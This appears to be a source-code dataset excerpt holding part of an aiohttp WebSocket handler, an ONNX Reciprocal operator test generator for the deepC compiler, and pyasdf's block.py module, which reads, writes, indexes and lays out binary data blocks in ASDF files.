async def send_json(self, data: dict) -> None:
await self._ws.send_json(data)
async def close(self, code: int, reason: str) -> None:
await self._ws.close(code=code, message=reason.encode())
async def handle_request(self) -> web.StreamResponse:
await self._ws.prepare(self._request)
try:
async for ws_message in self._ws:
if ws_message.type == http.WSMsgType.TEXT:
await self.handle_message(ws_message.json())
else:
error_message = "WebSocket message type must be text"
await self.handle_invalid_message(error_message)
finally:
for operation_id in list(self.subscriptions.keys()):
await self.cleanup_operation(operation_id)
return self._ws
| true | true |
1c2c9673239875aebecc14562678e37ce6ad98b8 | 1,827 | py | Python | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 223 | 2020-04-15T20:34:33.000Z | 2022-03-28T05:41:49.000Z | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 42 | 2019-07-29T15:57:12.000Z | 2020-04-08T15:12:48.000Z | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 58 | 2019-07-22T11:46:19.000Z | 2020-04-09T22:56:41.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
#
# This file is part of DNN compiler maintained at
# https://github.com/ai-techsystems/dnnCompiler
import os, sys
import numpy as np
separator = os.path.sep
from onnx import *
sys.path.append(".."+separator+".."+separator+".."+separator+".."+separator+"python/parser")
from onnx_parser import *
# Operator under test.
op_name = 'Reciprocal'
# Graph input/output declarations.
# NOTE(review): Reciprocal is elementwise, yet the declared input shape
# (1, 2) differs from the output shape (2, 3) -- this looks
# inconsistent; confirm whether the parser ignores declared shapes.
inputs = [helper.make_tensor_value_info("X",TensorProto.FLOAT,(1,2))]
outputs = [helper.make_tensor_value_info("Y",TensorProto.FLOAT,(2,3))]
nodes = []
nodes.append(helper.make_node("Reciprocal",["X"],["Y"],))
graph = helper.make_graph(nodes, op_name+"_graph", inputs, outputs)
# Target ONNX opset 11.
opset = (OperatorSetIdProto(version=11),)
model = helper.make_model(graph, opset_imports=opset)
onnx.checker.check_model(model)
# Output locations: the .onnx testcase and the gold .sym file.
t_prefix = ".." + separator + "testcases" + separator + op_name + separator + op_name
g_prefix = ".." + separator + "gold_files" + separator + op_name
onnx.save(model, t_prefix+".onnx")
# Run the ONNX parser on the saved model, producing the gold files.
parse(t_prefix+".onnx", g_prefix+".sym", onnx_output_file=t_prefix+".txt")
| 38.87234 | 92 | 0.747126 |
import os, sys
import numpy as np
separator = os.path.sep
from onnx import *
sys.path.append(".."+separator+".."+separator+".."+separator+".."+separator+"python/parser")
from onnx_parser import *
op_name = 'Reciprocal'
inputs = [helper.make_tensor_value_info("X",TensorProto.FLOAT,(1,2))]
outputs = [helper.make_tensor_value_info("Y",TensorProto.FLOAT,(2,3))]
nodes = []
nodes.append(helper.make_node("Reciprocal",["X"],["Y"],))
graph = helper.make_graph(nodes, op_name+"_graph", inputs, outputs)
opset = (OperatorSetIdProto(version=11),)
model = helper.make_model(graph, opset_imports=opset)
onnx.checker.check_model(model)
t_prefix = ".." + separator + "testcases" + separator + op_name + separator + op_name
g_prefix = ".." + separator + "gold_files" + separator + op_name
onnx.save(model, t_prefix+".onnx")
parse(t_prefix+".onnx", g_prefix+".sym", onnx_output_file=t_prefix+".txt")
| true | true |
1c2c968d6375a6da31f54444f303b6cd1847f7a9 | 41,031 | py | Python | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | pyasdf/block.py | mdboom/pyasdf | ac4e9f85bf96206fdd6bc3d0708875c953c66dc5 | [
"BSD-3-Clause"
] | null | null | null | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
from collections import namedtuple
import copy
import hashlib
import io
import os
import re
import struct
import weakref
import numpy as np
import six
from six.moves.urllib import parse as urlparse
import yaml
from . import compression as mcompression
from .compat.numpycompat import NUMPY_LT_1_7
from . import constants
from . import generic_io
from . import stream
from . import treeutil
from . import util
from . import yamlutil
class BlockManager(object):
"""
Manages the `Block`s associated with a ASDF file.
"""
def __init__(self, asdffile):
self._asdffile = weakref.ref(asdffile)
self._internal_blocks = []
self._external_blocks = []
self._inline_blocks = []
self._streamed_blocks = []
self._block_type_mapping = {
'internal': self._internal_blocks,
'external': self._external_blocks,
'inline': self._inline_blocks,
'streamed': self._streamed_blocks
}
self._data_to_block_mapping = {}
self._validate_checksums = False
def __len__(self):
"""
Return the total number of blocks being managed.
This may not include all of the blocks in an open file, since
their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
return sum(len(x) for x in self._block_type_mapping.values())
def add(self, block):
"""
Add an internal block to the manager.
"""
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block not in block_set:
block_set.append(block)
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
if block.array_storage == 'streamed' and len(self._streamed_blocks) > 1:
raise ValueError("Can not add second streaming block")
if block._data is not None:
self._data_to_block_mapping[id(block._data)] = block
def remove(self, block):
"""
Remove a block from the manager.
"""
block_set = self._block_type_mapping.get(block.array_storage, None)
if block_set is not None:
if block in block_set:
block_set.remove(block)
if block._data is not None:
if id(block._data) in self._data_to_block_mapping:
del self._data_to_block_mapping[id(block._data)]
else:
raise ValueError(
"Unknown array storage type {0}".format(block.array_storage))
def set_array_storage(self, block, array_storage):
"""
Set the array storage type of the given block.
Parameters
----------
block : Block instance
array_storage : str
Must be one of:
- ``internal``: The default. The array data will be
stored in a binary block in the same ASDF file.
- ``external``: Store the data in a binary block in a
separate ASDF file.
- ``inline``: Store the data as YAML inline in the tree.
- ``streamed``: The special streamed inline block that
appears at the end of the file.
"""
if array_storage not in ['internal', 'external', 'streamed', 'inline']:
raise ValueError(
"array_storage must be one of 'internal', 'external', "
"'streamed' or 'inline'")
if block.array_storage != array_storage:
if block in self.blocks:
self.remove(block)
block._array_storage = array_storage
self.add(block)
if array_storage == 'streamed':
block.compression = None
@property
def blocks(self):
"""
An iterator over all blocks being managed.
This may not include all of the blocks in an open file,
since their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
for block_set in self._block_type_mapping.values():
for block in block_set:
yield block
@property
def internal_blocks(self):
"""
An iterator over all internal blocks being managed.
This may not include all of the blocks in an open file,
since their reading may have been deferred. Call
`finish_reading_internal_blocks` to find the positions and
header information of all blocks in the file.
"""
for block_set in (self._internal_blocks, self._streamed_blocks):
for block in block_set:
yield block
@property
def streamed_block(self):
"""
The streamed block (always the last internal block in a file),
or `None` if a streamed block is not present.
"""
self.finish_reading_internal_blocks()
if len(self._streamed_blocks):
return self._streamed_blocks[0]
@property
def external_blocks(self):
"""
An iterator over all external blocks being managed.
"""
for block in self._external_blocks:
yield block
@property
def inline_blocks(self):
"""
An iterator over all inline blocks being managed.
"""
for block in self._inline_blocks:
yield block
def has_blocks_with_offset(self):
"""
Returns `True` if any of the internal blocks currently have an
offset assigned.
"""
for block in self.internal_blocks:
if block.offset is not None:
return True
return False
def _sort_blocks_by_offset(self):
def sorter(x):
if x.offset is None:
raise ValueError('Block is missing offset')
else:
return x.offset
self._internal_blocks.sort(key=sorter)
def _read_next_internal_block(self, fd, past_magic=False):
# This assumes the file pointer is at the beginning of the
# block, (or beginning + 4 if past_magic is True)
block = Block().read(
fd, past_magic=past_magic,
validate_checksum=self._validate_checksums)
if block is not None:
self.add(block)
return block
def read_internal_blocks(self, fd, past_magic=False,
validate_checksums=False):
"""
Read internal blocks present in the file. If the file is
seekable, only the first block will be read, and the reading
of all others will be lazily deferred until an the loading of
an array requests it.
Parameters
----------
fd : GenericFile
The file to read from.
past_magic : bool, optional
If `True`, the file position is immediately after the
block magic token. If `False` (default), the file
position is exactly at the beginning of the block magic
token.
validate_checksums : bool, optional
If `True`, validate the blocks against their checksums.
"""
self._validate_checksums = validate_checksums
while True:
block = self._read_next_internal_block(fd, past_magic=past_magic)
if block is None:
break
past_magic = False
# If the file handle is seekable, we only read the first
# block and defer reading the rest until later.
if fd.seekable():
break
def finish_reading_internal_blocks(self):
"""
Read all remaining internal blocks present in the file, if any.
This is called before updating a file, since updating requires
knowledge of all internal blocks in the file.
"""
if len(self._internal_blocks):
for i, block in enumerate(self._internal_blocks):
if isinstance(block, UnloadedBlock):
block.load()
last_block = self._internal_blocks[-1]
# Read all of the remaining blocks in the file, if any
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
last_block = self._read_next_internal_block(
last_block._fd, False)
if last_block is None:
break
def write_internal_blocks_serial(self, fd, pad_blocks=False):
"""
Write all blocks to disk serially.
Parameters
----------
fd : generic_io.GenericFile
The file to write internal blocks to. The file position
should be after the tree.
"""
for block in self.internal_blocks:
if block.is_compressed:
block.offset = fd.tell()
block.write(fd)
else:
padding = util.calculate_padding(
block.size, pad_blocks, fd.block_size)
block.allocated = block._size + padding
block.offset = fd.tell()
block.write(fd)
fd.fast_forward(block.allocated - block._size)
def write_internal_blocks_random_access(self, fd):
"""
Write all blocks to disk at their specified offsets. All
internal blocks must have an offset assigned at this point.
Parameters
----------
fd : generic_io.GenericFile
The file to write internal blocks to. The file position
should be after the tree.
"""
self._sort_blocks_by_offset()
iter = self.internal_blocks
last_block = next(iter)
# We need to explicitly clear anything between the tree
# and the first block, otherwise there may be other block
# markers left over which will throw off block indexing.
# We don't need to do this between each block.
fd.clear(last_block.offset - fd.tell())
for block in iter:
last_block.allocated = ((block.offset - last_block.offset) -
last_block.header_size)
fd.seek(last_block.offset)
last_block.write(fd)
last_block = block
last_block.allocated = last_block.size
fd.seek(last_block.offset)
last_block.write(fd)
fd.truncate(last_block.end_offset)
def write_external_blocks(self, uri, pad_blocks=False):
"""
Write all blocks to disk serially.
Parameters
----------
uri : str
The base uri of the external blocks
"""
from . import asdf
for i, block in enumerate(self.external_blocks):
if uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
subfd = self.get_external_uri(uri, i)
asdffile = asdf.AsdfFile()
block = copy.copy(block)
block._array_storage = 'internal'
asdffile.blocks.add(block)
block._used = True
asdffile.write_to(subfd, pad_blocks=pad_blocks)
def write_block_index(self, fd, ctx):
"""
Write the block index.
Parameters
----------
fd : GenericFile
The file to write to. The file pointer should be at the
end of the file.
"""
if len(self._internal_blocks) and not len(self._streamed_blocks):
fd.write(constants.INDEX_HEADER)
fd.write(b'\n')
offsets = [x.offset for x in self.internal_blocks]
yaml_version = tuple(
int(x) for x in ctx.version_map['YAML_VERSION'].split('.'))
yaml.dump(
offsets, Dumper=yamlutil._yaml_base_dumper, stream=fd,
explicit_start=True, explicit_end=True,
version=yaml_version,
allow_unicode=True, encoding='utf-8')
_re_index_content = re.compile(
b'^' + constants.INDEX_HEADER + b'\r?\n%YAML.*\.\.\.\r?\n?$')
_re_index_misc = re.compile(b'^[\n\r\x20-\x7f]+$')
def read_block_index(self, fd, ctx):
"""
Read the block index.
Parameters
----------
fd : GenericFile
The file to read from. It must be seekable.
"""
# This reads the block index by reading backward from the end
# of the file. This tries to be as conservative as possible,
# since not reading an index isn't a deal breaker --
# everything can still be read from the file, only slower.
# Importantly, it must remain "transactionally clean", and not
# create any blocks until we're sure the block index makes
# sense.
if not fd.seekable():
return
if not len(self._internal_blocks):
return
first_block = self._internal_blocks[0]
first_block_end = first_block.end_offset
fd.seek(0, generic_io.SEEK_END)
file_size = block_end = fd.tell()
# We want to read on filesystem block boundaries. We use
# "block_end - 5" here because we need to read at least 5
# bytes in the first block.
block_start = ((block_end - 5) // fd.block_size) * fd.block_size
buff_size = block_end - block_start
content = b''
fd.seek(block_start, generic_io.SEEK_SET)
buff = fd.read(buff_size)
# Extra '\0' bytes are allowed after the ..., mainly to
# workaround poor truncation support on Windows
buff = buff.rstrip(b'\0')
content = buff
# We need an explicit YAML end marker, or there's no
# block index
for ending in (b'...', b'...\r\n', b'...\n'):
if content.endswith(ending):
break
else:
return
# Read blocks in reverse order from the end of the file
while True:
# Look for the index header
idx = content.find(constants.INDEX_HEADER)
if idx != -1:
content = content[idx:]
index_start = block_start + idx
break
else:
# If the rest of it starts to look like binary
# values, bail...
if not self._re_index_misc.match(buff):
return
if block_start <= first_block_end:
return
block_end = block_start
block_start = max(block_end - fd.block_size, first_block_end)
fd.seek(block_start, generic_io.SEEK_SET)
buff_size = block_end - block_start
buff = fd.read(buff_size)
content = buff + content
yaml_content = content[content.find(b'\n') + 1:]
offsets = yaml.load(yaml_content,
Loader=yamlutil._yaml_base_loader)
# Make sure the indices look sane
if not isinstance(offsets, list) or len(offsets) == 0:
return
last_offset = 0
for x in offsets:
if (not isinstance(x, six.integer_types) or
x > file_size or
x < 0 or
x <= last_offset + Block._header.size):
return
last_offset = x
# We always read the first block, so we can confirm that the
# first entry in the block index matches the first block
if offsets[0] != first_block.offset:
return
if len(offsets) == 1:
# If there's only one block in the index, we've already
# loaded the first block, so just return: we have nothing
# left to do
return
# One last sanity check: Read the last block in the index and
# make sure it makes sense.
fd.seek(offsets[-1], generic_io.SEEK_SET)
try:
block = Block().read(fd)
except (ValueError, IOError):
return
# Now see if the end of the last block leads right into the index
if (block.end_offset != index_start):
return
# It seems we're good to go, so instantiate the UnloadedBlock
# objects
for offset in offsets[1:-1]:
self._internal_blocks.append(UnloadedBlock(fd, offset))
# We already read the last block in the file -- no need to read it again
self._internal_blocks.append(block)
def get_external_filename(self, filename, index):
"""
Given a main filename and an index number, return a new file
name for referencing an external block.
"""
filename = os.path.splitext(filename)[0]
return filename + '{0:04d}.asdf'.format(index)
    def get_external_uri(self, uri, index):
        """
        Given a main URI and an index number, return a new URI for
        saving an external block.
        """
        if uri is None:
            uri = ''
        parts = list(urlparse.urlparse(uri))
        # parts[2] is the path component of the parsed URI.
        path = parts[2]
        dirname, filename = os.path.split(path)
        # Derive "<stem><index:04d>.asdf" next to the main file.
        filename = self.get_external_filename(filename, index)
        # NOTE(review): os.path.join uses the OS separator; on Windows
        # this can place '\' into a URI path -- verify intended behavior.
        path = os.path.join(dirname, filename)
        parts[2] = path
        return urlparse.urlunparse(parts)
def _find_used_blocks(self, tree, ctx):
reserved_blocks = set()
for node in treeutil.iter_tree(tree):
hook = ctx.type_index.get_hook_for_type(
'reserve_blocks', type(node), ctx.version_string)
if hook is not None:
for block in hook(node, ctx):
reserved_blocks.add(block)
for block in list(self.blocks):
if (getattr(block, '_used', 0) == 0 and
block not in reserved_blocks):
self.remove(block)
def _handle_global_block_settings(self, ctx, block):
all_array_storage = getattr(ctx, '_all_array_storage', None)
if all_array_storage:
self.set_array_storage(block, all_array_storage)
all_array_compression = getattr(ctx, '_all_array_compression', None)
if all_array_compression:
block.compression = all_array_compression
auto_inline = getattr(ctx, '_auto_inline', None)
if auto_inline:
if np.product(block.data.shape) < auto_inline:
self.set_array_storage(block, 'inline')
def finalize(self, ctx):
"""
At this point, we have a complete set of blocks for the file,
with no extras.
Here, they are reindexed, and possibly reorganized.
"""
# TODO: Should this reset the state (what's external and what
# isn't) afterword?
self._find_used_blocks(ctx.tree, ctx)
for block in list(self.blocks):
self._handle_global_block_settings(ctx, block)
def get_block(self, source):
"""
Given a "source identifier", return a block.
Parameters
----------
source : any
If an integer, refers to the index of an internal block.
If a string, is a uri to an external block.
Returns
-------
buffer : buffer
"""
# If an "int", it is the index of an internal block
if isinstance(source, six.integer_types):
if source == -1:
if len(self._streamed_blocks):
return self._streamed_blocks[0]
# If we don't have a streamed block, fall through so
# we can read all of the blocks, ultimately arriving
# at the last one, which, if all goes well is a
# streamed block.
# First, look in the blocks we've already read
elif source >= 0:
if source < len(self._internal_blocks):
return self._internal_blocks[source]
else:
raise ValueError("Invalid source id {0}".format(source))
# If we have a streamed block or we already know we have
# no blocks, reading any further isn't going to yield any
# new blocks.
if len(self._streamed_blocks) or len(self._internal_blocks) == 0:
raise ValueError("Block '{0}' not found.".format(source))
# If the desired block hasn't already been read, and the
# file is seekable, and we have at least one internal
# block, then we can move the file pointer to the end of
# the last known internal block, and start looking for
# more internal blocks. This is "deferred block loading".
last_block = self._internal_blocks[-1]
if (last_block._fd is not None and
last_block._fd.seekable()):
last_block._fd.seek(last_block.end_offset)
while True:
next_block = self._read_next_internal_block(
last_block._fd, False)
if next_block is None:
break
if len(self._internal_blocks) - 1 == source:
return next_block
last_block = next_block
if (source == -1 and
last_block.array_storage == 'streamed'):
return last_block
raise ValueError("Block '{0}' not found.".format(source))
elif isinstance(source, six.string_types):
asdffile = self._asdffile().open_external(
source, do_not_fill_defaults=True)
block = asdffile.blocks._internal_blocks[0]
self.set_array_storage(block, 'external')
else:
raise TypeError("Unknown source '{0}'".format(source))
return block
def get_source(self, block):
"""
Get a source identifier for a given block.
Parameters
----------
block : Block
Returns
-------
source_id : str
May be an integer for an internal block, or a URI for an
external block.
"""
for i, internal_block in enumerate(self.internal_blocks):
if block == internal_block:
if internal_block.array_storage == 'streamed':
return -1
return i
for i, external_block in enumerate(self.external_blocks):
if block == external_block:
if self._asdffile().uri is None:
raise ValueError(
"Can't write external blocks, since URI of main file is "
"unknown.")
parts = list(urlparse.urlparse(self._asdffile().uri))
path = parts[2]
filename = os.path.basename(path)
return self.get_external_filename(filename, i)
raise ValueError("block not found.")
def find_or_create_block_for_array(self, arr, ctx):
"""
For a given array, looks for an existing block containing its
underlying data. If not found, adds a new block to the block
list. Returns the index in the block list to the array.
Parameters
----------
arr : numpy.ndarray
Returns
-------
block : Block
"""
from .tags.core import ndarray
if (isinstance(arr, ndarray.NDArrayType) and
arr.block is not None):
if arr.block in self.blocks:
return arr.block
else:
arr._block = None
base = util.get_array_base(arr)
block = self._data_to_block_mapping.get(id(base))
if block is not None:
return block
block = Block(base)
self.add(block)
self._handle_global_block_settings(ctx, block)
return block
def get_streamed_block(self):
"""
Get the streamed block, which is always the last one. A
streamed block, on writing, does not manage data of its own,
but the user is expected to stream it to disk directly.
"""
block = self.streamed_block
if block is None:
block = Block(array_storage='streamed')
self.add(block)
return block
def add_inline(self, array):
"""
Add an inline block for ``array`` to the block set.
"""
block = Block(array, array_storage='inline')
self.add(block)
return block
def __getitem__(self, arr):
return self.find_or_create_block_for_array(arr, object())
def close(self):
for block in self.blocks:
block.close()
class Block(object):
"""
Represents a single block in a ASDF file. This is an
implementation detail and should not be instantiated directly.
Instead, should only be created through the `BlockManager`.
"""
_header = util.BinaryStruct([
('flags', 'I'),
('compression', '4s'),
('allocated_size', 'Q'),
('used_size', 'Q'),
('data_size', 'Q'),
('checksum', '16s')
])
def __init__(self, data=None, uri=None, array_storage='internal'):
self._data = data
self._uri = uri
self._array_storage = array_storage
self._fd = None
self._offset = None
self._compression = None
self._checksum = None
self._memmapped = False
self.update_size()
self._allocated = self._size
def __repr__(self):
return '<Block {0} off: {1} alc: {2} siz: {3}>'.format(
self._array_storage[:3], self._offset, self._allocated,
self._size)
def __len__(self):
return self._size
@property
def offset(self):
return self._offset
@offset.setter
def offset(self, offset):
self._offset = offset
@property
def allocated(self):
return self._allocated
@allocated.setter
def allocated(self, allocated):
self._allocated = allocated
@property
def header_size(self):
return self._header.size + constants.BLOCK_HEADER_BOILERPLATE_SIZE
@property
def data_offset(self):
return self._offset + self.header_size
@property
def size(self):
return self._size + self.header_size
@property
def end_offset(self):
"""
The offset of the end of the allocated space for the block,
and where the next block should begin.
"""
return self.offset + self.header_size + self.allocated
def override_byteorder(self, byteorder):
return byteorder
@property
def array_storage(self):
return self._array_storage
@property
def compression(self):
return self._compression
@compression.setter
def compression(self, compression):
self._compression = mcompression.validate(compression)
@property
def is_compressed(self):
return self._compression is not None
@property
def checksum(self):
return self._checksum
def _set_checksum(self, checksum):
if checksum == b'\0' * 16:
self._checksum = None
else:
self._checksum = checksum
def _calculate_checksum(self, data):
m = hashlib.new('md5')
m.update(self.data)
return m.digest()
def validate_checksum(self):
"""
Validate the content of the block against the current checksum.
Returns
-------
valid : bool
`True` if the content is valid against the current
checksum or there is no current checksum. Otherwise,
`False`.
"""
if self._checksum:
checksum = self._calculate_checksum(self.data)
if checksum != self._checksum:
return False
return True
def update_checksum(self):
"""
Update the checksum based on the current data contents.
"""
self._checksum = self._calculate_checksum(self.data)
def update_size(self):
"""
Recalculate the on-disk size of the block. This causes any
compression steps to run. It should only be called when
updating the file in-place, otherwise the work is redundant.
"""
if self._data is not None:
if six.PY2:
self._data_size = len(self._data.data)
else:
self._data_size = self._data.data.nbytes
if not self.is_compressed:
self._size = self._data_size
else:
self._size = mcompression.get_compressed_size(
self._data, self.compression)
else:
self._data_size = self._size = 0
def read(self, fd, past_magic=False, validate_checksum=False):
"""
Read a Block from the given Python file-like object.
If the file is seekable, the reading or memmapping of the
actual data is postponed until an array requests it. If the
file is a stream, the data will be read into memory
immediately.
Parameters
----------
fd : GenericFile
past_magic : bool, optional
If `True`, the file position is immediately after the
block magic token. If `False` (default), the file
position is exactly at the beginning of the block magic
token.
validate_checksum : bool, optional
If `True`, validate the data against the checksum, and
raise a `ValueError` if the data doesn't match.
"""
offset = None
if fd.seekable():
offset = fd.tell()
if not past_magic:
buff = fd.read(len(constants.BLOCK_MAGIC))
if len(buff) < 4:
return None
if buff not in (constants.BLOCK_MAGIC,
constants.INDEX_HEADER[:len(buff)]):
raise ValueError(
"Bad magic number in block. "
"This may indicate an internal inconsistency about the "
"sizes of the blocks in the file.")
if buff == constants.INDEX_HEADER[:len(buff)]:
return None
elif offset is not None:
offset -= 4
buff = fd.read(2)
header_size, = struct.unpack(b'>H', buff)
if header_size < self._header.size:
raise ValueError(
"Header size must be >= {0}".format(self._header.size))
buff = fd.read(header_size)
header = self._header.unpack(buff)
# This is used by the documentation system, but nowhere else.
self._flags = header['flags']
self.compression = header['compression']
self._set_checksum(header['checksum'])
if (self.compression is None and
header['used_size'] != header['data_size']):
raise ValueError(
"used_size and data_size must be equal when no compression is used.")
if (header['flags'] & constants.BLOCK_FLAG_STREAMED and
self.compression is not None):
raise ValueError(
"Compression set on a streamed block.")
if fd.seekable():
# If the file is seekable, we can delay reading the actual
# data until later.
self._fd = fd
self._header_size = header_size
self._offset = offset
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
fd.fast_forward(-1)
self._array_storage = 'streamed'
self._data_size = self._size = self._allocated = \
(fd.tell() - self.data_offset) + 1
else:
fd.fast_forward(header['allocated_size'])
self._allocated = header['allocated_size']
self._size = header['used_size']
self._data_size = header['data_size']
else:
# If the file is a stream, we need to get the data now.
if header['flags'] & constants.BLOCK_FLAG_STREAMED:
# Support streaming blocks
self._array_storage = 'streamed'
self._data = fd.read_into_array(-1)
self._data_size = self._size = self._allocated = len(self._data)
else:
self._data_size = header['data_size']
self._size = header['used_size']
self._allocated = header['allocated_size']
self._data = self._read_data(
fd, self._size, self._data_size, self.compression)
fd.fast_forward(self._allocated - self._size)
fd.close()
if validate_checksum and not self.validate_checksum():
raise ValueError(
"Block at {0} does not match given checksum".format(
self._offset))
return self
def _read_data(self, fd, used_size, data_size, compression):
        """
        Read this block's payload from *fd*.

        If *compression* is set, the *used_size* compressed bytes are
        decompressed to *data_size* bytes; otherwise the bytes are read
        straight into an array.
        """
        if compression:
            return mcompression.decompress(
                fd, used_size, data_size, compression)
        return fd.read_into_array(used_size)
def write(self, fd):
        """
        Write an internal block to the given Python file-like object.

        Emits the 4-byte block magic, a 2-byte big-endian header size,
        the packed header, and then the (possibly compressed) data.
        """
        self._header_size = self._header.size
        flags = 0
        data_size = used_size = allocated_size = 0
        if self._array_storage == 'streamed':
            # Streamed blocks record no sizes in the header; the data
            # simply runs to the end of the file.
            flags |= constants.BLOCK_FLAG_STREAMED
        elif self._data is not None:
            self.update_checksum()
            if not fd.seekable() and self.is_compressed:
                # We can't seek back later to patch the header with the
                # compressed size, so compress into a scratch buffer
                # first to learn the size up front.  ``buff`` is reused
                # when the data is written below.
                buff = io.BytesIO()
                mcompression.compress(buff, self._data, self.compression)
                self.allocated = self._size = buff.tell()
            data_size = self._data.nbytes
            allocated_size = self.allocated
            used_size = self._size
        if self.checksum is not None:
            checksum = self.checksum
        else:
            # 16 zero bytes means "no checksum recorded".
            checksum = b'\0' * 16
        fd.write(constants.BLOCK_MAGIC)
        fd.write(struct.pack(b'>H', self._header_size))
        fd.write(self._header.pack(
            flags=flags,
            compression=mcompression.to_compression_header(
                self.compression),
            allocated_size=allocated_size,
            used_size=used_size, data_size=data_size,
            checksum=checksum))
        if self._data is not None:
            if self.is_compressed:
                if not fd.seekable():
                    # Non-seekable: emit the buffer compressed above.
                    fd.write(buff.getvalue())
                else:
                    # If the file is seekable, we write the
                    # compressed data directly to it, then go back
                    # and write the resulting size in the block
                    # header.
                    start = fd.tell()
                    mcompression.compress(fd, self._data, self.compression)
                    end = fd.tell()
                    self.allocated = self._size = end - start
                    # +6 skips the 4-byte magic and the 2-byte
                    # header-size field to land on the header itself.
                    fd.seek(self.offset + 6)
                    self._header.update(
                        fd,
                        allocated_size=self.allocated,
                        used_size=self._size)
                    fd.seek(end)
            else:
                fd.write_array(self._data)
@property
def data(self):
        """
        Get the data for the block, as a numpy array.

        The data is read lazily on first access: an uncompressed block
        on a memory-mappable file is memmapped in place; otherwise the
        bytes are read (and decompressed if necessary) into memory and
        cached on the instance.
        """
        if self._data is None:
            if self._fd.is_closed():
                raise IOError(
                    "ASDF file has already been closed. "
                    "Can not get the data.")
            # Be nice and reset the file position after we're done
            curpos = self._fd.tell()
            try:
                if not self.is_compressed and self._fd.can_memmap():
                    # Zero-copy path: map the on-disk bytes directly.
                    self._data = self._fd.memmap_array(
                        self.data_offset, self._size)
                    self._memmapped = True
                else:
                    self._fd.seek(self.data_offset)
                    self._data = self._read_data(
                        self._fd, self._size, self._data_size,
                        self.compression)
            finally:
                self._fd.seek(curpos)
        return self._data
def close(self):
        """
        Drop this block's reference to its data, flushing a live memory
        map back to disk first.
        """
        if self._data is not None and self._memmapped:
            if NUMPY_LT_1_7:  # pragma: no cover
                # numpy < 1.7 may raise ValueError from flush(); ignore it.
                try:
                    self._data.flush()
                except ValueError:
                    pass
            else:
                self._data.flush()
                if self._data._mmap is not None:
                    self._data._mmap.close()
            self._data = None
class UnloadedBlock(object):
    """
    Represents an indexed, but not yet loaded, internal block. All
    that is known about it is its offset. It converts itself to a
    full-fledged block whenever the underlying data or more detail is
    requested.
    """
def __init__(self, fd, offset):
        # Mirror the attribute set of `Block` so code that touches
        # these names works before the object has been loaded.
        self._fd = fd
        self._offset = offset
        self._data = None
        self._uri = None
        self._array_storage = 'internal'
        self._compression = None
        self._checksum = None
        self._memmapped = False
def __len__(self):
        # `load()` swaps self's class to `Block` (see `load` below), so
        # the recursive-looking `len(self)` actually dispatches to
        # `Block.__len__` on the second call.
        self.load()
        return len(self)
def close(self):
        # Nothing to release until the block is actually loaded.
        pass
@property
def array_storage(self):
        return 'internal'
@property
def offset(self):
        return self._offset
def __getattr__(self, attr):
        # Any attribute not defined here triggers a full load, after
        # which the lookup is retried on the (now `Block`) instance.
        self.load()
        return getattr(self, attr)
def load(self):
        """Convert this placeholder in place into a fully-read Block."""
        self._fd.seek(self._offset, generic_io.SEEK_SET)
        # Reassigning __class__ converts the object in place; all
        # subsequent method calls use the real `Block` implementations.
        self.__class__ = Block
        self.read(self._fd)
def calculate_updated_layout(blocks, tree_size, pad_blocks, block_size):
    """
    Calculates a block layout that will try to use as many blocks as
    possible in their original locations, though at this point the
    algorithm is fairly naive. The result will be stored in the
    offsets of the blocks.

    Parameters
    ----------
    blocks : Blocks instance
    tree_size : int
        The amount of space to reserve for the tree at the beginning.
    pad_blocks : bool or float
        Passed through to `util.calculate_padding` when computing extra
        space after a block.
    block_size : int
        The file's block size; passed through to
        `util.calculate_padding`.

    Returns
    -------
    Returns `False` if no good layout can be found and one is best off
    rewriting the file serially, otherwise, returns `True`.
    """
    def unfix_block(i):
        # Move fixed entry i back onto the free list, copying its data
        # into memory so closing the block doesn't lose it.
        # If this algorithm gets more sophisticated we could carefully
        # move memmapped blocks around without clobbering other ones.
        # TODO: Copy to a tmpfile on disk and memmap it from there.
        entry = fixed[i]
        copy = entry.block.data.copy()
        entry.block.close()
        entry.block._data = copy
        del fixed[i]
        free.append(entry.block)
    def fix_block(block, offset):
        # Pin `block` at `offset` and keep `fixed` sorted by start.
        block.offset = offset
        fixed.append(Entry(block.offset, block.offset + block.size, block))
        fixed.sort()
    Entry = namedtuple("Entry", ['start', 'end', 'block'])
    # `fixed`: blocks that already have (or have been assigned) offsets;
    # `free`: blocks still needing a location.
    fixed = []
    free = []
    for block in blocks._internal_blocks:
        if block.offset is not None:
            block.update_size()
            fixed.append(
                Entry(block.offset, block.offset + block.size, block))
        else:
            free.append(block)
    if not len(fixed):
        return False
    fixed.sort()
